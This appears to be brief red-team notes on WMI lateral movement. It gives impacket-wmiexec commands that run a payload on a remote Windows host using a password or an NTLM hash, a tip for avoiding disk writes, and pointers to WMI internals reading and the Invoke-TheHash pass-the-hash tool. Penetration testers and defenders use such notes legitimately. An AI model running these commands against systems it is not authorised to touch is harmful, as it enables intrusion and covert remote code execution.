
To execute a remote file with WMI (needs creds, see SMB to put file):

impacket-wmiexec -nooutput testuser:[email protected] 'C:\Users\Public\payload.exe'

Same thing, but with a hash (1234567890abcdefg)

impacket-wmiexec -nooutput -hashes :1234567890abcdefg [email protected] 'C:\Users\Public\payload.exe'

Always use nooutput flag to avoid writing to disk - this is just for execution

WMI for Script Kiddies - TrustedSec

WMI Internals Part 1

This first release will cover the fundamentals of WMI and how to track back WMI activity to the WMI provider host process (WmiPrvse.exe), the executable responsible for executing WMI activity. This post is meant to give the information needed to understand part 2 of this series, which will cover the relationship between WMI and COM.


Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.